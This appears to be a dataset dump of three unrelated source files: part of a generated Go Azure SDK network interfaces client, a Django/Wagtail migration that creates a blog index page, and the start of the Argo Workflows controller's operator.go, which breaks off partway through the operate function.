return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetEffectiveRouteTable", nil, "Failure preparing request")
}
resp, err := client.GetEffectiveRouteTableSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetEffectiveRouteTable", resp, "Failure sending request")
}
result, err = client.GetEffectiveRouteTableResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "GetEffectiveRouteTable", resp, "Failure responding to request")
}
return
}
// GetEffectiveRouteTablePreparer prepares the GetEffectiveRouteTable request.
func (client InterfacesClient) GetEffectiveRouteTablePreparer(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// GetEffectiveRouteTableSender sends the GetEffectiveRouteTable request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) GetEffectiveRouteTableSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// GetEffectiveRouteTableResponder handles the response to the GetEffectiveRouteTable request. The method always
// closes the http.Response Body.
func (client InterfacesClient) GetEffectiveRouteTableResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted),
autorest.ByClosing())
result.Response = resp
return
}
// GetVirtualMachineScaleSetNetworkInterface the Get network interface
// operation retrieves information about the specified network interface in a
// virtual machine scale set.
//
// resourceGroupName is the name of the resource group.
// virtualMachineScaleSetName is the name of the virtual machine scale set.
// virtualmachineIndex is the virtual machine index. networkInterfaceName is
// the name of the network interface. expand is expand references resources.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterface(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string, networkInterfaceName string, expand string) (result Interface, err error) {
req, err := client.GetVirtualMachineScaleSetNetworkInterfacePreparer(resourceGroupName, virtualMachineScaleSetName, virtualmachineIndex, networkInterfaceName, expand)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetVirtualMachineScaleSetNetworkInterface", nil, "Failure preparing request")
}
resp, err := client.GetVirtualMachineScaleSetNetworkInterfaceSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "GetVirtualMachineScaleSetNetworkInterface", resp, "Failure sending request")
}
result, err = client.GetVirtualMachineScaleSetNetworkInterfaceResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "GetVirtualMachineScaleSetNetworkInterface", resp, "Failure responding to request")
}
return
}
// GetVirtualMachineScaleSetNetworkInterfacePreparer prepares the GetVirtualMachineScaleSetNetworkInterface request.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterfacePreparer(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string, networkInterfaceName string, expand string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
"virtualmachineIndex": autorest.Encode("path", virtualmachineIndex),
"virtualMachineScaleSetName": autorest.Encode("path", virtualMachineScaleSetName),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
if len(expand) > 0 {
queryParameters["$expand"] = autorest.Encode("query", expand)
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// GetVirtualMachineScaleSetNetworkInterfaceSender sends the GetVirtualMachineScaleSetNetworkInterface request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterfaceSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// GetVirtualMachineScaleSetNetworkInterfaceResponder handles the response to the GetVirtualMachineScaleSetNetworkInterface request. The method always
// closes the http.Response Body.
func (client InterfacesClient) GetVirtualMachineScaleSetNetworkInterfaceResponder(resp *http.Response) (result Interface, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// List the List networkInterfaces operation retrieves all the
// networkInterfaces in a resource group.
//
// resourceGroupName is the name of the resource group.
func (client InterfacesClient) List(resourceGroupName string) (result InterfaceListResult, err error) {
req, err := client.ListPreparer(resourceGroupName)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", nil, "Failure preparing request")
}
resp, err := client.ListSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure sending request")
}
result, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure responding to request")
}
return
}
// ListPreparer prepares the List request.
func (client InterfacesClient) ListPreparer(resourceGroupName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListSender sends the List request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListResponder handles the response to the List request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure sending next results request")
}
result, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "List", resp, "Failure responding to next results request")
}
return
}
// ListAll the List networkInterfaces operation retrieves all the
// networkInterfaces in a subscription.
func (client InterfacesClient) ListAll() (result InterfaceListResult, err error) {
req, err := client.ListAllPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", nil, "Failure preparing request")
}
resp, err := client.ListAllSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure sending request")
}
result, err = client.ListAllResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure responding to request")
}
return
}
// ListAllPreparer prepares the ListAll request.
func (client InterfacesClient) ListAllPreparer() (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListAllSender sends the ListAll request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListAllSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListAllResponder handles the response to the ListAll request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListAllResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListAllNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListAllNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListAllSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure sending next results request")
}
result, err = client.ListAllResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListAll", resp, "Failure responding to next results request")
}
return
}
// ListEffectiveNetworkSecurityGroups the list effective network security
// group operation retrieves all the network security groups applied on a
// networkInterface. This method may poll for completion. Polling can be
// canceled by passing the cancel channel argument. The channel will be used
// to cancel polling and any outstanding HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroups(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (result autorest.Response, err error) {
req, err := client.ListEffectiveNetworkSecurityGroupsPreparer(resourceGroupName, networkInterfaceName, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListEffectiveNetworkSecurityGroups", nil, "Failure preparing request")
}
resp, err := client.ListEffectiveNetworkSecurityGroupsSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListEffectiveNetworkSecurityGroups", resp, "Failure sending request")
}
result, err = client.ListEffectiveNetworkSecurityGroupsResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListEffectiveNetworkSecurityGroups", resp, "Failure responding to request")
}
return
}
// ListEffectiveNetworkSecurityGroupsPreparer prepares the ListEffectiveNetworkSecurityGroups request.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroupsPreparer(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// ListEffectiveNetworkSecurityGroupsSender sends the ListEffectiveNetworkSecurityGroups request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroupsSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// ListEffectiveNetworkSecurityGroupsResponder handles the response to the ListEffectiveNetworkSecurityGroups request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListEffectiveNetworkSecurityGroupsResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted),
autorest.ByClosing())
result.Response = resp
return
}
// ListVirtualMachineScaleSetNetworkInterfaces the list network interface
// operation retrieves information about all network interfaces in a virtual
// machine scale set.
//
// resourceGroupName is the name of the resource group.
// virtualMachineScaleSetName is the name of the virtual machine scale set.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfaces(resourceGroupName string, virtualMachineScaleSetName string) (result InterfaceListResult, err error) {
req, err := client.ListVirtualMachineScaleSetNetworkInterfacesPreparer(resourceGroupName, virtualMachineScaleSetName)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", nil, "Failure preparing request")
}
resp, err := client.ListVirtualMachineScaleSetNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure sending request")
}
result, err = client.ListVirtualMachineScaleSetNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure responding to request")
}
return
}
// ListVirtualMachineScaleSetNetworkInterfacesPreparer prepares the ListVirtualMachineScaleSetNetworkInterfaces request.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesPreparer(resourceGroupName string, virtualMachineScaleSetName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
"virtualMachineScaleSetName": autorest.Encode("path", virtualMachineScaleSetName),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListVirtualMachineScaleSetNetworkInterfacesSender sends the ListVirtualMachineScaleSetNetworkInterfaces request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListVirtualMachineScaleSetNetworkInterfacesResponder handles the response to the ListVirtualMachineScaleSetNetworkInterfaces request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListVirtualMachineScaleSetNetworkInterfacesNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListVirtualMachineScaleSetNetworkInterfacesNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListVirtualMachineScaleSetNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure sending next results request")
}
result, err = client.ListVirtualMachineScaleSetNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetNetworkInterfaces", resp, "Failure responding to next results request")
}
return
}
// ListVirtualMachineScaleSetVMNetworkInterfaces the list network interface
// operation retrieves information about all network interfaces in a virtual
// machine from a virtual machine scale set.
//
// resourceGroupName is the name of the resource group.
// virtualMachineScaleSetName is the name of the virtual machine scale set.
// virtualmachineIndex is the virtual machine index.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfaces(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string) (result InterfaceListResult, err error) {
req, err := client.ListVirtualMachineScaleSetVMNetworkInterfacesPreparer(resourceGroupName, virtualMachineScaleSetName, virtualmachineIndex)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", nil, "Failure preparing request")
}
resp, err := client.ListVirtualMachineScaleSetVMNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure sending request")
}
result, err = client.ListVirtualMachineScaleSetVMNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure responding to request")
}
return
}
// ListVirtualMachineScaleSetVMNetworkInterfacesPreparer prepares the ListVirtualMachineScaleSetVMNetworkInterfaces request.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesPreparer(resourceGroupName string, virtualMachineScaleSetName string, virtualmachineIndex string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
"virtualmachineIndex": autorest.Encode("path", virtualmachineIndex),
"virtualMachineScaleSetName": autorest.Encode("path", virtualMachineScaleSetName),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// ListVirtualMachineScaleSetVMNetworkInterfacesSender sends the ListVirtualMachineScaleSetVMNetworkInterfaces request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// ListVirtualMachineScaleSetVMNetworkInterfacesResponder handles the response to the ListVirtualMachineScaleSetVMNetworkInterfaces request. The method always
// closes the http.Response Body.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesResponder(resp *http.Response) (result InterfaceListResult, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListVirtualMachineScaleSetVMNetworkInterfacesNextResults retrieves the next set of results, if any.
func (client InterfacesClient) ListVirtualMachineScaleSetVMNetworkInterfacesNextResults(lastResults InterfaceListResult) (result InterfaceListResult, err error) {
req, err := lastResults.InterfaceListResultPreparer()
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListVirtualMachineScaleSetVMNetworkInterfacesSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure sending next results request")
}
result, err = client.ListVirtualMachineScaleSetVMNetworkInterfacesResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "ListVirtualMachineScaleSetVMNetworkInterfaces", resp, "Failure responding to next results request")
}
return
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
libraries/blog/migrations/0003_create_blogindex.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-18 00:36
from __future__ import unicode_literals
from django.db import migrations
from wagtail.core.models import Page
def create_blogindex(apps, schema_editor):
# Get models
ContentType = apps.get_model('contenttypes.ContentType')
BlogIndex = apps.get_model('blog.BlogIndex')
# Delete any existing blogindex
# Protects if migration is run multiple times
BlogIndex.objects.filter(slug='blog', depth=3).delete()
# Get content type for blogindex model
blogindex_content_type, __ = ContentType.objects.get_or_create(
model='blogindex', app_label='blog')
home_page = Page.objects.get(slug='home')
blogindex = BlogIndex(
title="CCA Libraries Blog",
draft_title="CCA Libraries Blog",
slug='blog',
content_type=blogindex_content_type,
depth=3,
url_path='/home/blog/'
)
# Create a new blogindex as child of home page
home_page.add_child(instance=blogindex)
def remove_blogindex(apps, schema_editor):
# Get models
# ContentType = apps.get_model('contenttypes.ContentType')
BlogIndex = apps.get_model('blog.BlogIndex')
# Delete the default blogindex
# Page and Site objects CASCADE
BlogIndex.objects.filter(slug='blog', depth=3).delete()
# Delete content type for homepage model
# NOTE: I don't _think_ we need to delete the blogindex content type
# I based this migration off of 0002_create_homepage.py
# ContentType.objects.filter(model='blogindex', app_label='blog').delete()
class Migration(migrations.Migration):
# we need the blogindex model to already exist
dependencies = [
('blog', '0002_blogindex'),
('home', '0002_create_homepage'),
('wagtailcore', '0040_page_draft_title'),
('wagtailcore', '0043_lock_fields'),
]
operations = [
migrations.RunPython(create_blogindex, remove_blogindex),
]
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
workflow/controller/operator.go
|
package controller
import (
"context"
"encoding/json"
"fmt"
"math"
"os"
"reflect"
"regexp"
"runtime/debug"
"sort"
"strconv"
"strings"
"sync"
"time"
"github.com/argoproj/pkg/humanize"
argokubeerr "github.com/argoproj/pkg/kube/errors"
"github.com/argoproj/pkg/strftime"
jsonpatch "github.com/evanphx/json-patch"
log "github.com/sirupsen/logrus"
apiv1 "k8s.io/api/core/v1"
policyv1beta "k8s.io/api/policy/v1beta1"
apierr "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apimachinery/pkg/util/strategicpatch"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/utils/pointer"
"sigs.k8s.io/yaml"
"github.com/argoproj/argo-workflows/v3/config"
"github.com/argoproj/argo-workflows/v3/errors"
"github.com/argoproj/argo-workflows/v3/pkg/apis/workflow"
wfv1 "github.com/argoproj/argo-workflows/v3/pkg/apis/workflow/v1alpha1"
"github.com/argoproj/argo-workflows/v3/pkg/client/clientset/versioned/typed/workflow/v1alpha1"
"github.com/argoproj/argo-workflows/v3/util"
"github.com/argoproj/argo-workflows/v3/util/diff"
envutil "github.com/argoproj/argo-workflows/v3/util/env"
errorsutil "github.com/argoproj/argo-workflows/v3/util/errors"
"github.com/argoproj/argo-workflows/v3/util/intstr"
"github.com/argoproj/argo-workflows/v3/util/resource"
"github.com/argoproj/argo-workflows/v3/util/retry"
"github.com/argoproj/argo-workflows/v3/util/template"
waitutil "github.com/argoproj/argo-workflows/v3/util/wait"
"github.com/argoproj/argo-workflows/v3/workflow/common"
controllercache "github.com/argoproj/argo-workflows/v3/workflow/controller/cache"
"github.com/argoproj/argo-workflows/v3/workflow/controller/estimation"
"github.com/argoproj/argo-workflows/v3/workflow/controller/indexes"
"github.com/argoproj/argo-workflows/v3/workflow/metrics"
"github.com/argoproj/argo-workflows/v3/workflow/progress"
argosync "github.com/argoproj/argo-workflows/v3/workflow/sync"
"github.com/argoproj/argo-workflows/v3/workflow/templateresolution"
wfutil "github.com/argoproj/argo-workflows/v3/workflow/util"
"github.com/argoproj/argo-workflows/v3/workflow/validate"
)
// wfOperationCtx is the context for evaluation and operation of a single workflow
type wfOperationCtx struct {
// wf is the workflow object. It should not be used in execution logic. woc.wfSpec should be used instead
wf *wfv1.Workflow
// orig is the original workflow object for purposes of creating a patch
orig *wfv1.Workflow
// updated indicates whether or not the workflow object itself was updated
// and needs to be persisted back to kubernetes
updated bool
// log is an logrus logging context to corralate logs with a workflow
log *log.Entry
// controller reference to workflow controller
controller *WorkflowController
// estimate duration
estimator estimation.Estimator
// globalParams holds any parameters that are available to be referenced
// in the global scope (e.g. workflow.parameters.XXX).
globalParams common.Parameters
// volumes holds a DeepCopy of wf.Spec.Volumes to perform substitutions.
// It is then used in addVolumeReferences() when creating a pod.
volumes []apiv1.Volume
// ArtifactRepository contains the default location of an artifact repository for container artifacts
artifactRepository *config.ArtifactRepository
// map of completed pods with their corresponding phases
completedPods map[string]apiv1.PodPhase
// deadline is the dealine time in which this operation should relinquish
// its hold on the workflow so that an operation does not run for too long
// and starve other workqueue items. It also enables workflow progress to
// be periodically synced to the database.
deadline time.Time
// activePods tracks the number of active (Running/Pending) pods for controlling
// parallelism
activePods int64
// workflowDeadline is the deadline which the workflow is expected to complete before we
// terminate the workflow.
workflowDeadline *time.Time
eventRecorder record.EventRecorder
// preExecutionNodePhases contains the phases of all the nodes before the current operation. Necessary to infer
// changes in phase for metric emission
preExecutionNodePhases map[string]wfv1.NodePhase
// execWf holds the Workflow for use in execution.
// In Normal workflow scenario: It holds copy of workflow object
// In Submit From WorkflowTemplate: It holds merged workflow with WorkflowDefault, Workflow and WorkflowTemplate
// 'execWf.Spec' should usually be used instead `wf.Spec`
execWf *wfv1.Workflow
}
var (
// ErrDeadlineExceeded indicates the operation exceeded its deadline for execution
ErrDeadlineExceeded = errors.New(errors.CodeTimeout, "Deadline exceeded")
// ErrParallelismReached indicates this workflow reached its parallelism limit
ErrParallelismReached = errors.New(errors.CodeForbidden, "Max parallelism reached")
ErrResourceRateLimitReached = errors.New(errors.CodeForbidden, "resource creation rate-limit reached")
// ErrTimeout indicates a specific template timed out
ErrTimeout = errors.New(errors.CodeTimeout, "timeout")
)
// maxOperationTime is the maximum time a workflow operation is allowed to run
// for before requeuing the workflow onto the workqueue.
var (
maxOperationTime = envutil.LookupEnvDurationOr("MAX_OPERATION_TIME", 30*time.Second)
)
// failedNodeStatus is a subset of NodeStatus that is only used to Marshal certain fields into a JSON of failed nodes
type failedNodeStatus struct {
DisplayName string `json:"displayName"`
Message string `json:"message"`
TemplateName string `json:"templateName"`
Phase string `json:"phase"`
PodName string `json:"podName"`
FinishedAt metav1.Time `json:"finishedAt"`
}
// newWorkflowOperationCtx creates and initializes a new wfOperationCtx object.
func newWorkflowOperationCtx(wf *wfv1.Workflow, wfc *WorkflowController) *wfOperationCtx {
// NEVER modify objects from the store. It's a read-only, local cache.
// You can use DeepCopy() to make a deep copy of original object and modify this copy
// Or create a copy manually for better performance
wfCopy := wf.DeepCopyObject().(*wfv1.Workflow)
woc := wfOperationCtx{
wf: wfCopy,
orig: wf,
execWf: wfCopy,
updated: false,
log: log.WithFields(log.Fields{
"workflow": wf.ObjectMeta.Name,
"namespace": wf.ObjectMeta.Namespace,
}),
controller: wfc,
globalParams: make(map[string]string),
volumes: wf.Spec.DeepCopy().Volumes,
completedPods: make(map[string]apiv1.PodPhase),
deadline: time.Now().UTC().Add(maxOperationTime),
eventRecorder: wfc.eventRecorderManager.Get(wf.Namespace),
preExecutionNodePhases: make(map[string]wfv1.NodePhase),
}
if woc.wf.Status.Nodes == nil {
woc.wf.Status.Nodes = make(map[string]wfv1.NodeStatus)
}
if woc.wf.Status.StoredTemplates == nil {
woc.wf.Status.StoredTemplates = make(map[string]wfv1.Template)
}
return &woc
}
// operate is the main operator logic of a workflow. It evaluates the current state of the workflow,
// and its pods and decides how to proceed down the execution path.
// TODO: an error returned by this method should result in requeuing the workflow to be retried at a
// later time
// As you must not call `persistUpdates` twice, you must not call `operate` twice.
func (woc *wfOperationCtx) operate(ctx context.Context) {
defer func() {
if woc.wf.Status.Fulfilled() {
_ = woc.killDaemonedChildren(ctx, "")
}
woc.persistUpdates(ctx)
}()
defer func() {
if r := recover(); r != nil {
woc.log.WithFields(log.Fields{"stack": string(debug.Stack()), "r": r}).Errorf("Recovered from panic")
if rerr, ok := r.(error); ok {
woc.markWorkflowError(ctx, rerr)
} else {
woc.markWorkflowError(ctx, fmt.Errorf("%v", r))
}
woc.controller.metrics.OperationPanic()
}
}()
woc.log.Infof("Processing workflow")
// Set the Execute workflow spec for execution
// ExecWF is a runtime execution spec which merged from Wf, WFT and Wfdefault
err := woc.setExecWorkflow(ctx)
if err != nil {
woc.log.WithError(err).Errorf("Unable to set ExecWorkflow")
return
}
if woc.wf.Status.ArtifactRepositoryRef == nil {
ref, err := woc.controller.artifactRepositories.Resolve(ctx, woc.execWf.Spec.ArtifactRepositoryRef, woc.wf.Namespace)
if err != nil {
woc.markWorkflowError(ctx, fmt.Errorf("failed to resolve artifact repository: %w", err))
return
}
woc.wf.Status.ArtifactRepositoryRef = ref
woc.updated = true
}
